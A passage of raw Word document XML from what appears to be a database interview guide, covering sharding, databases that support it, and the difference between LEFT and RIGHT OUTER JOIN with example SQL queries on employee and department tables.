          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C63C333" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="399"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sharding can be used to separate tenants in a multi-tenant system, ensuring data isolation and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A44610F" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Popular Databases with Sharding Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4C34A6" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MongoDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Supports automatic sharding with a flexible choice of shard keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C80A0" w14:textId="77777777" w:rsidR="005C04EB" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Cassandra</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Uses a consistent hashing mechanism for sharding data across a distributed cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195DE372" w14:textId="18D08147" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="005C04EB" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="400"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Though not natively sharded, sharding can be implemented at the application level or with third-party tools like Vitess.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D688CAC" w14:textId="5D17C0BA" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc178383309"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explain the difference between LEFT OUTER JOIN and RIGHT OUTER JOIN.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="2CBC8D15" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LEFT OUTER JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587D249C" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>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The LEFT OUTER JOIN (or simply LEFT JOIN) returns all the rows from the left table and the matching rows from the right table. If there is no match, the result is NULL on the side of the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F26789" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157ADE12" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>All rows from the left table are included in the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A61036" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rows from the right table are included only if there is a match with the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC8BFE1" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If there is no match, the result set contains NULL values for the columns from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267619E5" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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1C45115D" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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employees.name, departments.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B7CD7E" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46531C4C" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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LEFT OUTER JOIN departments ON employees.department_id = departments.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7176AB" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="401"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This query retrieves all employee names and their corresponding department names. If an employee is not assigned to any department, the department name will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E28B97" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RIGHT OUTER JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0211D0F0" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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The RIGHT OUTER JOIN (or simply RIGHT JOIN) returns all the rows from the right table and the matching rows from the left table. If there is no match, the result is NULL on the side of the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008939B2" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B76FF1D" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>All rows from the right table are included in the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F25D4C6" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Rows from the left table are included only if there is a match with the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39605D13" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If there is no match, the result set contains NULL values for the columns from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF7962" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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39CA02FB" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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employees.name, departments.name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E11E98" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785F64AA" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C"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RIGHT OUTER JOIN departments ON employees.department_id = departments.id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA5B77A" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="402"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: This query retrieves all department names and their corresponding employee names. If a department has no employees, the employee name will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367CCEEA" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Key Differences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AA9C4" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LEFT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EFBE56" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Returns all rows from the left table and matched rows from the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3265C614" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unmatched rows from the right table are filled with NULLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056CC922" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RIGHT OUTER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CC4FD" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Returns all rows from the right table and matched rows from the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCDFB20" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="403"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Unmatched rows from the left table are filled with NULLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2527AC9B" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Visual Representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E156FB3" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Assuming Table A is on the left and Table B is on the right:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B2B7A" w14:textId="77777777" w:rsidR="00A1777C" w:rsidRPr="00DA2F32" w:rsidRDefault="00A1777C" w:rsidP="009E0607">
